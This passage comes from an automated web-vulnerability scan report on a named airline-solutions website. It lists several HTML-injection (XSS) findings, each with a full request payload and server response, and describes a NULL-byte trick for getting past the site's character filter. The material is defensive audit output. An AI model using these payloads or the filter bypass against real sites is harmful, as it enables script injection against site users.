Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A1%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:40:50 GMT
Pragma: no-cache
Content-Length: 6970
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>7f1e076aefd=1">other airline issues?%00f61d7<a>7f1e076aefd=1</a>
...[SNIP]...

3.48. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/other_airline_issues/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00ad915<a>d7416594ce8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad915<a>d7416594ce8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/other_airline_issues/?%00ad915<a>d7416594ce8=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:46:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323238; expires=Thu, 06-Oct-2011 10:46:41 GMT; path=/
Set-Cookie: exp_last_activity=1286380000; expires=Thu, 06-Oct-2011 10:46:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:47:03 GMT
Pragma: no-cache
Content-Length: 7034
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>d7416594ce8=1">?%00ad915<a>d7416594ce8=1</a>
...[SNIP]...

3.49. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/other_airline_issues/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fe03e"><a>5df3cb060b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe03e"><a>5df3cb060b1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/other_airline_issues/?%00fe03e"><a>5df3cb060b1=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:42:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323238; expires=Thu, 06-Oct-2011 10:42:15 GMT; path=/
Set-Cookie: exp_last_activity=1286379734; expires=Thu, 06-Oct-2011 10:42:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:42:36 GMT
Pragma: no-cache
Content-Length: 7038
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/other_airline_issues/?%00fe03e"><a>5df3cb060b1=1">
...[SNIP]...

3.50. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/revenue_growth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00ddcb8<a>b66fa2a9b31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddcb8<a>b66fa2a9b31 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/revenue_growth?%00ddcb8<a>b66fa2a9b31=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321583; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:30:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321583; expires=Thu, 06-Oct-2011 10:30:08 GMT; path=/
Set-Cookie: exp_last_activity=1286379008; expires=Thu, 06-Oct-2011 10:30:08 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fbusiness_issues%2Frevenue_growth%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:30:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>b66fa2a9b31=1">revenue growth?%00ddcb8<a>b66fa2a9b31=1</a>
...[SNIP]...

3.51. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/revenue_growth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00282cf"><a>70df90e6b20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 282cf"><a>70df90e6b20 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/revenue_growth?%00282cf"><a>70df90e6b20=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321583; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:26:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321583; expires=Thu, 06-Oct-2011 10:26:18 GMT; path=/
Set-Cookie: exp_last_activity=1286378778; expires=Thu, 06-Oct-2011 10:26:18 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fbusiness_issues%2Frevenue_growth%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:26:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/revenue_growth?%00282cf"><a>70df90e6b20=1">
...[SNIP]...

3.52. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/revenue_growth/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dd32d"><a>ee461130351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd32d"><a>ee461130351 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/revenue_growth/?%00dd32d"><a>ee461130351=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:50:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322245; expires=Thu, 06-Oct-2011 10:50:10 GMT; path=/
Set-Cookie: exp_last_activity=1286380210; expires=Thu, 06-Oct-2011 10:50:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fbusiness_issues%2Frevenue_growth%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:50:23 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="/home/business_issues/revenue_growth/?%00dd32d"><a>ee461130351=1">
...[SNIP]...

3.53. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues/revenue_growth/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00cfc96<a>b6269248590 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfc96<a>b6269248590 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/business_issues/revenue_growth/?%00cfc96<a>b6269248590=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/business_issues
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:52:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322245; expires=Thu, 06-Oct-2011 10:52:54 GMT; path=/
Set-Cookie: exp_last_activity=1286380374; expires=Thu, 06-Oct-2011 10:52:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fbusiness_issues%2Frevenue_growth%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:53:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a>b6269248590=1">?%00cfc96<a>b6269248590=1</a>
...[SNIP]...

3.54. http://www.sabreairlinesolutions.com/home/contact [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002e1da"><a>9ac32faf577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e1da"><a>9ac32faf577 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact?%002e1da"><a>9ac32faf577=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:12:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316757; expires=Wed, 05-Oct-2011 17:12:37 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:12:48 GMT
Pragma: no-cache
Content-Length: 7147
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact?%002e1da"><a>9ac32faf577=1">
...[SNIP]...

3.55. http://www.sabreairlinesolutions.com/home/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %004f026<a>f0cf889536 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4f026<a>f0cf889536 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/?%004f026<a>f0cf889536=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321409; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:56:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321409; expires=Thu, 06-Oct-2011 09:56:39 GMT; path=/
Set-Cookie: exp_last_activity=1286376999; expires=Thu, 06-Oct-2011 09:56:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A2%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:56:51 GMT
Pragma: no-cache
Content-Length: 7176
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>f0cf889536=1">?%004f026<a>f0cf889536=1</a>
...[SNIP]...

3.56. http://www.sabreairlinesolutions.com/home/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008f3cb"><a>f542c5fd65d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f3cb"><a>f542c5fd65d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/?%008f3cb"><a>f542c5fd65d=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
